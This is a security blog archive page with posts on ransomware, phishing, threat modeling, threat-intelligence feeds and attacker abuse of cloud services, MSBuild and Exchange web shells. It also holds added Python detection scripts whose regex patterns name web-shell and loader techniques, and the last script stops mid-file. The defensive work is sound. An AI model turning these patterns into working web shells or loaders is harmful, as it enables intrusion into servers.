Ransomware is a type of malware. It blocks access to a system or threatens to publish proprietary information. Ransomware perpetrators demand that their victim companies pay them cash ransoms to unlock systems or return information.

So far in 2022, ransomware attacks on companies are 33% higher than they were in 2021. Many companies agree to pay ransoms to get their systems back, only to be hit again by the same ransomware perpetrators.

Ransomware attacks are costly. They can damage company reputations. Many times ransomware can enter a corporate network through a channel that is open with a vendor or a supplier that has weaker security on its network.

One step companies can take is to audit the security measures that their suppliers and vendors use to ensure that the end-to-end supply chain is secure.

3. Phishing

Almost everyone has received a suspicious email, or worse yet, an email that appears to be legitimate and from a trusted party but isn’t. This email trickery is known as phishing.

Phishing is a major threat to companies because it is easy for unsuspecting employees to open bogus emails and unleash viruses. Employee training on how to recognize phony emails, report them and never open them can really help. IT should team with HR to ensure that sound email habits are taught.

4. IoT

In 2020, 61% of companies were using IoT, and this percentage only continues to increase. With the expansion of IoT, security risks also grow. IoT vendors are notorious for implementing little to no security on their devices. IT can combat this threat by vetting IoT vendors upfront in the RFP process for security and by resetting IoT security defaults on devices so they conform to corporate standards.

If your organization is looking for more guidance on IoT security, the experts at TechRepublic Premium have put together an ebook for IT leaders that is filled with what to look out for and strategies to deal with threats.

5. Internal employees

Disgruntled employees can sabotage networks or make off with intellectual property and proprietary information, and employees who practice poor security habits can inadvertently share passwords and leave equipment unprotected. This is why there has been an uptick in the number of companies that use social engineering audits to check how well employee security policies and procedures are working. In 2023, social engineering audits will continue to be used so IT can check the robustness of its workforce security policies and practices.

6. Data poisoning

An IBM 2022 study found that 35% of companies were using AI in their business and 42% were exploring it. Artificial intelligence is going to open up new possibilities for companies in every industry. Unfortunately, the bad actors know this, too.

Cases of data poisoning in AI systems have started to appear. In a data poisoning attack, a malicious actor finds a way to inject corrupted data into an AI system, skewing the results of an AI query and potentially returning a false result to company decision makers.

Data poisoning is a new attack vector into corporate systems. One way to protect against it is to continuously monitor your AI results. If you suddenly see a system trending significantly away from what it has revealed in the past, it’s time to look at the integrity of the data.

7. New technology

Organizations are adopting new technology like biometrics. These technologies yield enormous benefits, but they also introduce new security risks since IT has limited experience with them. One step IT can take is to carefully vet each new technology and its vendors before signing a purchase agreement.

8. Multi-layer security

How much security is enough? If you’ve firewalled your network, installed security monitoring and interception software, secured your servers, issued multi-factor authentication sign-ons to employees and implemented data encryption, but you forgot to lock the physical facilities containing servers or to install the latest security updates on smartphones, are you covered?

There are many layers of security that IT must batten down and monitor. IT can tighten up security by creating a checklist for every security breach point in a workflow.

Facing Cyber Threats Head On: Protecting Yourself and Your Business

Tags: cyber threats


Oct 15 2022

STRIDE covers threats to the CIA

Category: Information Security, Threat Modeling | DISC @ 12:53 pm

I’ve been meaning to talk more about what I actually do, which is help the teams within Microsoft who are threat modeling (for our boxed software) to do their jobs better.  Better means faster, cheaper or more effectively.  There are good reasons to optimize for different points on that spectrum (of better/faster/cheaper) at different times in different products.   One of the things that I’ve learned is that we ask a lot of developers, testers, and PMs here.  They all have some exposure to security, but terms that I’ve been using for years are often new to them.

Larry Osterman is a longtime MS veteran, currently working in Windows audio.  He’s been a threat modeling advocate for years, and has been blogging a lot about our new processes, and describes in great detail the STRIDE per element process.   His recent posts are “Threat Modeling, Once Again,” “Threat modeling again. Drawing the diagram,” “Threat Modeling Again: STRIDE,” “Threat modeling again, STRIDE mitigations,” “Threat modeling again, what does STRIDE have to do with threat modeling,” “Threat modeling again, STRIDE per element,” “Threat modeling again, threat modeling playsound.”

I wanted to chime in and offer up this handy chart that we use.  It’s part of how we teach people to go from a diagram to a set of threats.  We used to ask them to brainstorm, and have discovered that that works a lot better with some structure.

Source:

Threat Modeling for security

Tags: STRIDE Chart, Threat modeling


Oct 11 2022

Top Cybersecurity Threats for Public Sector

Phishing

An IRONSCALES survey published in October 2021 shows over 80% of respondents experienced an increase in email phishing attacks since the start of the pandemic.

Phishing involves the utilization of legitimate-looking emails to steal the login credentials or other sensitive information of a target organization. While it’s just as much a risk for small and medium-sized businesses, in the public sector, phishing attacks could potentially be nation-state sponsored, making it a possible double whammy.

While taking advantage of the latest and greatest software to protect yourself from top cybersecurity threats is par for the course, what makes phishing so pernicious is that it relies on human error. With phishing emails looking more authentic than ever, they are harder to catch.

Distributed Denial of Service (DDoS) Attacks

A recent report says ransom DDoS attacks increased 29% year over year and 175% quarter over quarter in quarter four of 2021. Some of the biggest targets were the public sector, schools, travel organizations, and credit unions.

DDoS attacks are known to bring down some of the largest websites and are quite difficult to prevent. They are considered by some to be the most “powerful weapon” on the internet, easily making DDoS attacks one of the top cyber security threats to the government.

DDoS attacks can happen at any time, affect any part of a website, and disrupt and interrupt services, usually leading to massive financial damage.

Nation-State Sponsored Cyber Attacks

With mainstream media broadcasting events daily, as they occur, to every channel imaginable (cable TV, smartphones, social media, etc.), cyber warfare has become an increasingly common way to launch disinformation campaigns, perform cyber espionage or terrorism, and even cyber-sabotage targets.

Nation-state-sponsored cyber attacks aim to:

  • Hinder communication
  • Gather intelligence
  • Steal intellectual property
  • Damage digital and physical infrastructure

They are even used for financial gain.

Though cyber attacks are sometimes used in tandem with real life attacks, what makes cyber warfare especially challenging is that it happens virtually and often covertly. There usually isn’t any declaration of war. That makes it difficult to prove who is responsible for the attack.

Ransomware

Ransomware attacks may not be an emerging trend by any means. They may not even be anything new. But they do have a history of wreaking havoc on the public sector and therefore need to be taken seriously.

Rewind to 2019, when the U.S. was hit by an unrelenting barrage of ransomware attacks that ultimately affected at least 966 government agencies, educational establishments, and healthcare providers, at a cost of $7.5 billion (Emsisoft).

These attacks resulted in 911 services being interrupted, surveillance systems going offline, badge scanners and building access systems not working, websites going down, extended tax payment deadlines, and much more.

The threat of ransomware attacks still looms today and is no less a concern in 2022 than it was in 2019. As far as cyber security threats to the government are concerned, ransomware attacks should be kept on the cybersecurity radar.

What Can the Public Sector Do to Stay Ahead?

Beyond taking full advantage of the latest tech, for the public sector to stay ahead of cyber security threats, organizations have to create a culture of cybersecurity, offering ongoing training to their teams.

You need to secure all infrastructure, including cloud, mobile, and Internet of Things (IoT). You also want to improve compromise detection and be fully prepared for any attack. Plans should be documented and practiced regularly, so detection and response are immediate.

Conclusion

The top cybersecurity threats are generally a consequence of new technologies the public sector is either looking to implement or is already implementing. It is harder to know all the variables and potential vulnerabilities with anything new.

This isn’t to suggest that old technologies are more reliable, however. Like antivirus software, the virus definitions must be continually updated for the software to remain effective. The public sector needs to stay on the cutting edge of best practices.

The public sector must also remain agile in adapting to new threats, whether offering ongoing cybersecurity training, hiring skilled consultants to keep their new technological infrastructures in check, partnering with experienced cybersecurity service providers like Indusface, or otherwise.

Top Cybersecurity Threats for Public Sector

DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Follow DISC #InfoSec blog

Ask DISC an InfoSec & compliance related question

Tags: Cybersecurity Threats


Oct 06 2022

Top Cybersecurity Threats for Public Sector

In the private sector, hackers and cybercriminals are prone to leaving organizations with good security infrastructures alone. Because they often go after low-hanging fruit, hacking into a well-protected network is perceived as more trouble than it’s worth.

But the public sector is a different matter entirely. The government and government agencies have access to assets and data that criminals would love to get their hands on, even with the added trouble. So, even though the public sector is well protected, it will not stop cybercriminals from attempting to break in.

The top cybersecurity threats for the public sector are as follows.

Phishing

An IRONSCALES survey published in October 2021 shows over 80% of respondents experienced an increase in email phishing attacks since the start of the pandemic.

Phishing involves the utilization of legitimate-looking emails to steal the login credentials or other sensitive information of a target organization. While it’s just as much a risk for small and medium-sized businesses, in the public sector, phishing attacks could potentially be nation-state sponsored, making it a possible double whammy.

While taking advantage of the latest and greatest software to protect yourself from top cybersecurity threats is par for the course, what makes phishing so pernicious is that it relies on human error. With phishing emails looking more authentic than ever, they are harder to catch.

Distributed Denial of Service (DDoS) Attacks

A recent report says ransom DDoS attacks increased 29% year over year and 175% quarter over quarter in quarter four of 2021. Some of the biggest targets were the public sector, schools, travel organizations, and credit unions.

DDoS attacks are known to bring down some of the largest websites and are quite difficult to prevent. They are considered by some to be the most “powerful weapon” on the internet, easily making DDoS attacks one of the top cyber security threats to the government.

DDoS attacks can happen at any time, affect any part of a website, and disrupt and interrupt services, usually leading to massive financial damage.

Nation-State Sponsored Cyber Attacks

With mainstream media broadcasting events daily, as they occur, to every channel imaginable (cable TV, smartphones, social media, etc.), cyber warfare has become an increasingly common way to launch disinformation campaigns, perform cyber espionage or terrorism, and even cyber-sabotage targets.

Nation-state-sponsored cyber attacks aim to:

  • Hinder communication
  • Gather intelligence
  • Steal intellectual property
  • Damage digital and physical infrastructure

They are even used for financial gain.

Though cyber attacks are sometimes used in tandem with real life attacks, what makes cyber warfare especially challenging is that it happens virtually and often covertly. There usually isn’t any declaration of war. That makes it difficult to prove who is responsible for the attack.

Ransomware

Ransomware attacks may not be an emerging trend by any means. They may not even be anything new. But they do have a history of wreaking havoc on the public sector and therefore need to be taken seriously.

Rewind to 2019, when the U.S. was hit by an unrelenting barrage of ransomware attacks that ultimately affected at least 966 government agencies, educational establishments, and healthcare providers, at a cost of $7.5 billion (Emsisoft).

These attacks resulted in 911 services being interrupted, surveillance systems going offline, badge scanners and building access systems not working, websites going down, extended tax payment deadlines, and much more.

The threat of ransomware attacks still looms today and is no less a concern in 2022 than it was in 2019. As far as cyber security threats to the government are concerned, ransomware attacks should be kept on the cybersecurity radar.

What Can the Public Sector Do to Stay Ahead?

Beyond taking full advantage of the latest tech, for the public sector to stay ahead of cyber security threats, organizations have to create a culture of cybersecurity, offering ongoing training to their teams.

You need to secure all infrastructure, including cloud, mobile, and Internet of Things (IoT). You also want to improve compromise detection and be fully prepared for any attack. Plans should be documented and practiced regularly, so detection and response are immediate.

Top Cybersecurity Threats for Public Sector

Tags: Top Cybersecurity Threats


Jul 08 2022

ENISA released the Threat Landscape Methodology

Category: Cyber Threats, Threat detection, Threat Modeling | DISC @ 11:17 am

I’m proud to announce that the European Union Agency for Cybersecurity, ENISA, has released the Threat Landscape Methodology.

Policy makers, risk managers and information security practitioners need up-to-date and accurate information on the current threat landscape, supported by threat intelligence. The EU Agency for Cybersecurity (ENISA) Threat Landscape report has been published on an annual basis since 2013. The report uses publicly available data and provides an independent view on observed threat agents, trends and attack vectors.

ENISA aims at building on its expertise and enhancing this activity so that its stakeholders receive relevant and timely information for policy-creation, decision-making and applying security measures, as well as in increasing knowledge and information for specialised cybersecurity communities or for establishing a solid understanding of the cybersecurity challenges related to new technologies.

The added value of ENISA cyberthreat intelligence efforts lies in offering updated information on the dynamically changing cyberthreat landscape. These efforts support risk mitigation, promote situational awareness and proactively respond to future challenges. Following the revised form of the ENISA Threat Landscape Report 2021, ENISA continues to further improve this flagship initiative. ENISA seeks to provide targeted as well as general reports, recommendations, analyses and other actions on future cybersecurity scenarios and threat landscapes, supported through a clear and publicly available methodology.

By establishing the ENISA Cybersecurity Threat Landscape (CTL) methodology, the Agency aims to set a baseline for the transparent and systematic delivery of horizontal, thematic, and sectorial cybersecurity threat landscapes. The following threat landscapes could be considered as examples.

  • Horizontal threat landscapes, such as the overarching ENISA Threat Landscape (ETL), a product which aims to cover holistically a wide-range of sectors and industries.
  • Thematic threat landscapes, such as the ENISA Supply Chain Threat Landscape, a product which focuses on a specific theme, but covers many sectors.
  • Sectorial threat landscape, such as the ENISA 5G Threat Landscape, focuses on a specific sector. A sectorial threat landscape provides more focused information for a particular constituent or target group.

Recognising the significance of systematically and methodologically reporting on the threat landscape, ENISA has set up an ad hoc Working Group on Cybersecurity Threat Landscapes (CTL WG) consisting of experts from European and international public and private sector entities.

The scope of the CTL WG is to advise ENISA in designing, updating and reviewing the methodology for creating threat landscapes, including the annual ENISA Threat Landscape (ETL) Report. The WG enables ENISA to interact with a broad range of stakeholders for the purpose of collecting input on a number of relevant aspects. The overall focus of the methodological framework involves the identification and definition of the process, methods, stakeholders and tools as well as the various elements that, content-wise, constitute the cyberthreat Landscape (CTL).

You can download the ENISA Threat Landscape Methodology here:

ENISA Threat Landscape Methodology


Did you manage to assess the risks of remote work so that your company data remain safe?

To help you out, Advisera have created a free white paper: Checklist of cyber threats & safeguards when working from home, which outlines the key cyber threats and vulnerabilities you need to address.



Tags: ENISA, ENISA Threat Landscape, Threat Landscape Methodology


Jan 26 2022

Open-source Threat Intelligence Feeds

Category: Cyber Threats, Threat detection, Threat Modeling | DISC @ 10:56 pm


Threat intelligence feeds are a critical part of modern cybersecurity. Widely available online, these feeds record and track IP addresses and URLs that are associated with phishing scams, malware, bots, trojans, adware, spyware, ransomware and more. Open source threat intelligence feeds can be extremely valuable—if you use the right ones. While these collections are plentiful, there are some that are better than others. Being an actively updated database doesn’t guarantee that it is a highly reliable or detailed one either, as some of the best online haven’t necessarily been updated in a few months.

We will try to keep our own tally of some of the better open source threat intelligence feeds below, regularly updating it with new feeds and more details about each one. A share of the entries will be managed by private companies that have premium, or at least closed-source, offerings as well. This list is meant to cover free and open source security feed options.

1. Emerging Threats

Developed and offered by Proofpoint in both open source and a premium version, The Emerging Threats Intelligence feed (ET) is one of the highest rated threat intelligence feeds. ET classifies IP addresses and domain addresses associated with malicious activity online and tracks recent activity by either. The feed maintains 40 different categories for IPs and URLs, as well as a constantly updated confidence score.

2. FBI InfraGard

This being backed by the Federal Bureau of Investigation definitely gives it some clout. It’s actually a collaboration between the FBI and the private sector, with its information freely available to private companies and public sector institutions to keep appraised on threats relevant to 16 specific categories of infrastructure identified by the Cybersecurity and Infrastructure Security Agency (a department of the US Department for Homeland Security). Sectors include energy and nuclear power, communications, chemicals, agriculture, healthcare, IT, transportation, emergency services, water and dams, as well as manufacturing and financial.

3. Dan.me.uk

Dan is a collection of 10 tools that together report on IP and domain information. It includes info on IP subnets, the TOR status of IP addresses, DNS blacklists, IP address checking for autonomous systems, and node lists.

4. CINS Score

The CINS Score is supported by Sentinel. Like ET’s confidence score, the CINS Score rates IP addresses according to their trustworthiness. They add data about suspected or confirmed attacks from those IPs in the form of frequency, nature and breadth. They also try to create ‘personas’ around the sorts of attacks those IPs are tied to: scanning, network or remote desktop vulnerabilities, malware bots, or command-and-control servers.

5. Blocklist.de

Blocklist.de pays attention to server attacks from SSH, FTP, email and webserver sources. Their site claims to report an average of 70,000 attacks every 12 hours using a combo of the abusix.org database, Ripe-Abuse-Finder, and Whois information.

6. hpHosts

hpHosts is a searchable database and hosts file that is community managed. While it was last updated in August 2019, it is considered one of the more reliable data stores of malicious IPs online. It can also be sorted by PSH and FSA-only.

7. AlienVault OTX

AlienVault Open Threat Exchange (OTX) is the company’s free, community-based project to monitor and rank IPs by reputation. It generates alert feeds called “pulses,” which can be manually entered into the system, to index attacks by various malware sources. While some pulses are generated by the community, AlienVault creates its own as well that automatically subscribes all OTX’s users. Most pulses are automatically API-generated and submitted via the OTX Python SDK. This example, SSH bruteforce logs 2016-06-09, shows the indicators, geoip of the attacks, and a full list of the IPs used. It also links to reports in other pulses that include the same IPs.

8. Abuse.ch Feodo Tracker

This abuse.ch offering focuses on botnets and command-and-control infrastructure (C&C). The blocklist is an amalgamation of several minor blocklists with attention paid to Heodo and Dridex malware bots. There were 5,374 entries as of 03-03-2020.

The name itself refers to an older trojan called Feodo, which was a successor to the Cridex e-banking trojan (to which both Dridex and Heodo trace their source code). Feodo Tracker also tracks an associated malware bot, TrickBot.

9. Abuse.ch URLhaus

The first of two projects from the Swiss website abuse.ch, URLhaus is a repository of malicious domains tied to distributing malware. The database can be accessed via the URLhaus API, allowing you to download CSV collections of flagged URLs, each site’s current status, the type of threat associated with it, and more. Ready-made downloads include recent additions (going back 30 days) or all active URLs.

The full URLhaus dataset—as updated every 5 minutes—is automatically and immediately available for CSV download. It also includes a ruleset suited for use in Suricata or Snort. URLhaus also offers a DNS firewall dataset that includes all marked URLs for blocking. 

source: https://logz.io/blog/open-source-threat-intelligence-feeds/

Practical Threat Intelligence and Data-Driven Threat Hunting: A hands-on guide to threat hunting with the ATT&CK™ Framework and open source tools

Tags: Open-source Threat Intelligence Feeds


Jan 13 2022

Threat actors abuse public cloud services to spread multiple RATs

Category: Cyber Threats, Threat detection, Threat Modeling | DISC @ 10:05 am

Threat actors are actively exploiting public cloud services from Amazon and Microsoft to spread RATs such as Nanocore, Netwire, and AsyncRAT, which are used to steal sensitive information from compromised systems.

The malware campaign was spotted by Cisco Talos in October 2021; most of the victims were located in the United States, Italy and Singapore.

Threat actors leverage cloud services like Azure and AWS because they can be set up easily with minimal effort, which makes it more difficult for defenders to detect and mitigate the campaigns.

The attackers used complex obfuscation techniques in the downloader script.

The attack chain starts with a phishing email carrying a malicious ZIP attachment that contains an ISO image with a loader in the form of JavaScript, a Windows batch file or a Visual Basic script. Upon executing the initial script, the victim’s machine downloads the next stage from the C2 server, which can be hosted on an Azure cloud-based Windows server or an AWS EC2 instance.

“To deliver the malware payload, the actor registered several malicious subdomains using DuckDNS, a free dynamic DNS service. The malware families associated with this campaign are variants of the Netwire, Nanocore and AsyncRAT remote access trojans.” reads the analysis published by Talos. “Organizations should be inspecting outgoing connections to cloud computing services for malicious traffic. The campaigns described in this post demonstrate increasing usage of popular cloud platforms for hosting malicious infrastructure.”

Once the malware is installed on the target system, it can be used to steal confidential data or to deliver additional payloads such as ransomware. Threat actors can also sell the access to other cybercrime gangs, including ransomware affiliates.

“Organizations should deploy comprehensive multi-layered security controls to detect similar threats and safeguard their assets. Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints. It is even more important for organizations to improve email security to detect and mitigate malicious email messages and break the infection chain as early as possible.” concludes the report that also includes Indicators of Compromise (IoCs).
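The open-source feed post above describes URLhaus CSV exports (flagged URLs, each with a status and threat type), and the Talos report quoted here recommends inspecting outgoing connections and notes the use of DuckDNS subdomains. The following is an added example, not code from the original page, logz.io, abuse.ch or Talos: it loads a constructed feed export that mimics the URLhaus CSV column layout (an assumption; check the header comment of the real download before relying on it), then matches constructed proxy log lines against active and inactive feed hosts and, as a weaker heuristic, against the dynamic DNS suffix the report names.

```python
import csv
from urllib.parse import urlparse

# Constructed feed export mimicking the URLhaus CSV layout (assumption: verify
# the header comment of the real download before relying on these columns).
FEED_CSV = """\
# URLhaus-style export (constructed sample, not real indicators)
# id,dateadded,url,url_status,last_online,threat,tags,urlhaus_link,reporter
"101","2022-01-10 08:15:02","http://bad-cdn.example/loader.js","online","2022-01-12 09:00:00","malware_download","js,loader","https://urlhaus.abuse.ch/url/101/","constructed"
"102","2021-12-01 11:00:00","http://old-host.example/drop.exe","offline","2021-12-03 00:00:00","malware_download","exe","https://urlhaus.abuse.ch/url/102/","constructed"
"103","2022-01-11 14:30:00","http://stage.lookalike.example:8080/x.bat","online","2022-01-12 10:00:00","malware_download","bat","https://urlhaus.abuse.ch/url/103/","constructed"
"""

# Constructed outbound proxy log: timestamp client method url http_status
PROXY_LOG = """\
2022-01-12T09:01:10Z 10.0.5.17 GET http://bad-cdn.example/loader.js 200
2022-01-12T09:02:44Z 10.0.5.17 GET http://updates.vendor.example/patch.msi 200
2022-01-12T09:03:01Z 10.0.5.22 GET http://files-sync.duckdns.org/stage2.vbs 200
2022-01-12T09:04:12Z 10.0.5.30 GET http://old-host.example/drop.exe 404
"""

# Dynamic DNS provider named in the Talos analysis quoted above. A match is a
# "look closer" heuristic, not proof of compromise: DuckDNS has legitimate users.
DYNDNS_SUFFIXES = ("duckdns.org",)


def host_of(url):
    """Lower-cased hostname of a URL without the port, or None if unparseable."""
    try:
        return urlparse(url).hostname
    except ValueError:
        return None


def load_feed(text):
    """Parse a URLhaus-style CSV export into {host: {status, threat, tags}}.

    Comment lines are skipped. If a host appears more than once, an 'online'
    entry wins, so a currently active URL is never masked by an old offline one.
    """
    feed = {}
    rows = csv.reader(l for l in text.splitlines() if l and not l.startswith("#"))
    for row in rows:
        if len(row) < 7:
            continue  # truncated or malformed line
        _id, _added, url, status, _last_online, threat, tags = row[:7]
        host = host_of(url)
        if not host:
            continue
        prev = feed.get(host)
        if prev is None or (status == "online" and prev["status"] != "online"):
            feed[host] = {"status": status, "threat": threat,
                          "tags": tags.split(",") if tags else []}
    return feed


def scan_proxy_log(lines, feed, dyndns_suffixes=DYNDNS_SUFFIXES):
    """Return one finding per log line whose destination host is in the feed
    (high if the URL is still online, low if the feed marks it offline) or
    sits under a dynamic DNS suffix (medium)."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, client, _method, url, _status = parts[:5]
        host = host_of(url)
        if not host:
            continue
        rec = feed.get(host)
        if rec is not None:
            findings.append({"time": ts, "client": client, "host": host,
                             "severity": "high" if rec["status"] == "online" else "low",
                             "reason": "feed:" + rec["threat"]})
        elif any(host == s or host.endswith("." + s) for s in dyndns_suffixes):
            findings.append({"time": ts, "client": client, "host": host,
                             "severity": "medium", "reason": "dynamic-dns"})
    return findings


if __name__ == "__main__":
    feed = load_feed(FEED_CSV)
    for f in scan_proxy_log(PROXY_LOG.splitlines(), feed):
        print(f"{f['severity']:6} {f['client']} -> {f['host']} ({f['reason']})")
```

The offline entry is still reported at low severity because a host that served malware recently is worth a second look even after the feed marks the URL down.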

Tags: Cyber-Security Threats, public cloud services, RATs


Dec 28 2021

Threat actors are abusing MSBuild to implant Cobalt Strike Beacons

Category: Cyber Threats, Threat detection, Threat Modeling | DISC @ 9:30 am

A security expert from Morphus Labs recently observed several malicious campaigns abusing the Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on compromised machines.

MSBuild is a free and open-source build toolset for managed code as well as native C++ code, and was originally part of the .NET Framework. It is used for building apps and gives users an XML schema that controls how the build platform processes and builds software; attackers abuse that same mechanism to compile and run their own code.

Morphus Labs security researcher and SANS Internet Storm Center (ISC) handler Renato Marinho revealed to have uncovered two different malicious campaigns that were abusing MSBuild for code execution.

The malicious MSBuild project employed in the attacks was designed to compile and execute specific C# code that in turn decodes and executes Cobalt Strike payload.

“Now, let’s look at the malicious MSBuild project file in Figure 3. Using the same principle, when called by MSBuild, it will compile and execute the custom C#, decode and execute the Cobalt Strike beacon on the victim’s machine.” wrote Marinho.

malicious msbuild project

In the attack scenario described by the researcher, the attackers initially gained access to the target environment using a valid remote desktop protocol (RDP) account, then leveraged remote Windows Services (SCM) for lateral movement, and MSBuild to execute the Cobalt Strike Beacon payload.

The Beacon was used to decrypt the communication with the C2 server, which was SSL encrypted.
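The project file described above compiles and runs C# embedded in the XML. As an added example (not code from Morphus Labs, SANS ISC or the page), here is a small triage script that walks MSBuild project files and reports any inline task (the documented `UsingTask` / `Task` / `Code` layout with a `CodeTaskFactory` or `RoslynCodeTaskFactory`) together with whether the embedded code carries a long opaque string literal of the kind a decode-and-execute stub needs; the two project files are constructed samples, and the 64-character threshold is an assumption.

```python
import re
import xml.etree.ElementTree as ET

# MSBuild task factories that compile code embedded in the project file itself
# (documented MSBuild feature; assumption: these are the names worth watching).
INLINE_FACTORIES = {"CodeTaskFactory", "RoslynCodeTaskFactory"}
# A long run of base64-alphabet characters inside a string literal: the kind of
# opaque blob a decode-and-execute stub carries. The length threshold is a guess.
OPAQUE_LITERAL = re.compile(r'"([A-Za-z0-9+/=]{64,})"')

# Constructed sample: an inline task whose body is harmless but has the shape
# described above (inline C# plus an opaque literal). Not the real project file.
SAMPLE_PROJECT = r"""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <Hello />
  </Target>
  <UsingTask TaskName="Hello" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Fragment" Language="cs"><![CDATA[
        // constructed stand-in for the decoder stub; it only logs a message
        string blob = "@BLOB@";
        Log.LogMessage("inline task ran, blob length " + blob.Length);
      ]]></Code>
    </Task>
  </UsingTask>
</Project>
""".replace("@BLOB@", "QUFB" * 20)

# Constructed sample: an ordinary project with no inline code.
CLEAN_PROJECT = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <Compile Include="Program.cs" />
  </ItemGroup>
  <Target Name="Build">
    <Csc Sources="@(Compile)" OutputAssembly="app.exe" />
  </Target>
</Project>
"""


def _local(tag):
    """Strip the XML namespace so old-style and SDK-style projects look the same."""
    return tag.rpartition("}")[2]


def inline_tasks(xml_text):
    """Return one record per UsingTask that compiles code embedded in the project."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "UsingTask":
            continue
        factory = el.get("TaskFactory", "")
        if factory not in INLINE_FACTORIES:
            continue
        code_el = next((c for c in el.iter() if _local(c.tag) == "Code"), None)
        code = (code_el.text or "") if code_el is not None else ""
        findings.append({
            "task": el.get("TaskName", "?"),
            "factory": factory,
            "language": code_el.get("Language", "cs") if code_el is not None else "",
            "code_lines": sum(1 for l in code.splitlines() if l.strip()),
            "opaque_literal": bool(OPAQUE_LITERAL.search(code)),
        })
    return findings


if __name__ == "__main__":
    for name, text in (("sample.proj", SAMPLE_PROJECT), ("clean.csproj", CLEAN_PROJECT)):
        print(name, "inline tasks:", inline_tasks(text) or "none")
```

Inline tasks have legitimate uses, so treat a hit as a prompt to read the embedded code, and pair it with process monitoring for MSBuild launched outside a build pipeline.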

Cobalt Strike, a Defender’s Guide

Cobalt Strike, a Defender’s Guide (The DFIR Report's 2021 Intrusions) by [The DFIR Report]

Tags: Cobalt Strike, Cobalt Strike Beacons, MSBuild


Dec 17 2021

SANS 2021 Top New Attacks and Threat Report

SANS 2021 Top New Attacks and Threat Report Download

System Security Threats | Computer Science Posters

Tags: SANS 2021, System Security Threats


Dec 06 2021

2022 and the threat landscape: The top 5 future cybersecurity challenges

2022 is going to be a year of building greater resiliency and integrating this into all aspects of business operations. This will require organizations of all levels to review how they are responding to a larger scale of sophisticated threats. To build on the efforts of 2021, CISOs need to address how they can implement innovation into their business without making themselves more vulnerable to damaging attacks.

There are five big trends that I see defining the market in 2022 that security professionals should pay attention to:

1. The rise of the “assume-breach” mindset

Zero trust applies the principle of fundamentally not trusting anything on or off your network and deploys an “assume-breach” mindset.

2. Innovation and new risk in 5G

3. Customization, personalization and getting personal with phishing tactics

4. Hackers will go for gold at the Beijing Olympics

5. The enterprise API ecosystem will show its vulnerabilities

The Ransomware Threat Landscape: Prepare for, recognize and survive ransomware attacks

Tags: threat landscape


May 20 2021

“Vishing”: An Ever Evolving Persistent Threat to the Public

Category: Mobile Security,Threat ModelingDISC @ 3:43 pm

Last month, my wife was contacted by a phisher masquerading as someone from Social Security. This threat actor attempted to obtain her Social Security number, using the threat of a fraud investigation to get her to verify it. Because of my background in security, I was able to act quickly to stop her from complying and educated her on the phishing attack. For many people this ends in far less positive outcomes, because there is not enough education and prevention out there. The majority of organizations will never request or disclose personally identifiable information (PII) and will only communicate via secure encrypted email or over traditional mail services; they will request an in-person visit. For more information on securing your private information, visit: How to protect your personal information

Caller ID is less reliable due to caller ID spoofing. This can in part be avoided by maintaining an address book in conjunction with a good call blocking service.

The majority of telecom providers offer programmable call blocking services; most of these operate with a programmable blacklist/whitelist. There are also third-party options in the device's app store. This function acts in many ways like malware detection and prevention. These features are also available as an add-on for a landline that blocks at the hardware level at the home or business demarcation point. This is slowly being phased out as more and more people migrate to VoIP or cellular-based services.

For more information on caller ID spoofing, visit: howtogeek Don't trust caller ID
More information on call blocking at FCC Call blocking
More information on call blocking for landlines at FCC Do not call list

Opinion: The best approach to handling telemarketers is a zero-trust approach: sellers you wish to do business with should be in your address book for ease of verification. Automated calling can potentially be used to gather recorded voice prompts as a persistent attack to collect voice commands for use on voice prompt services. These calls may also be used to verify that the contact number is active and accepting calls. If you can avoid answering a call or push it to voicemail, do it. Make sure you monitor your voicemail in the event a trusted contact is contacting you from a different contact source. Stay safe out there!

~Neumiller

Vishing attacks spoof Amazon to try to steal your credit card information


Tags: vishing


Apr 14 2021

The FBI Is Now Securing Networks Without Their Owners’ Permission

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 10:30 am

In January, we learned about a Chinese espionage campaign that exploited four zero-days in Microsoft Exchange. One characteristic of the campaign, in its later days when the Chinese operators probably realized the vulnerabilities would soon be fixed, was to install a web shell on compromised servers that would give them subsequent remote access. Even once the vulnerabilities were patched, the shell remained until the network operators removed it.

Now, months later, many of those shells are still in place. And they’re being used by criminal hackers as well.

On Tuesday, the FBI announced that it successfully received a court order to remove “hundreds” of these web shells from networks in the US.
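Hunting for left-behind shells is something every Exchange operator can do without waiting for a court order. The Python scanner below is an added example, not part of the original post and not FBI or Microsoft tooling: it walks an IIS-style directory, flags server-side script files that evaluate request data, spawn processes or compile code at runtime, and can restrict the hunt to files modified after a given date (for instance the patch date). The directory layout, file names and file contents it creates are constructed samples written to a temporary directory; the one-line JScript eval shell mirrors the well-known China Chopper shape.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Heuristic content signatures (constructed for this example, not a complete rule set).
# Short scripts that evaluate request-supplied data or spawn processes are the classic
# web-shell shape; reflective or runtime-compiled loaders are the stealthier variant.
PATTERNS = [
    ("eval_of_request", re.compile(r"eval\s*\(\s*Request", re.I)),
    ("jscript_unsafe", re.compile(r'Language\s*=\s*"?JScript"?', re.I)),
    ("process_start", re.compile(r"Process\.Start\s*\(|ProcessStartInfo", re.I)),
    ("reflective_load", re.compile(r"FromBase64String[\s\S]{0,300}?Assembly\.Load", re.I)),
    ("runtime_compile", re.compile(r"CSharpCodeProvider|CompileAssemblyFromSource", re.I)),
]
SCRIPT_EXTS = {".aspx", ".ashx", ".asmx", ".asax"}


def scan_file(path):
    """Return the reasons a file looks like a web shell (empty list if clean)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    reasons = [name for name, rx in PATTERNS if rx.search(text)]
    if reasons and len(text) < 4096:
        reasons.append("small_file")  # legitimate pages are rarely this short
    return reasons


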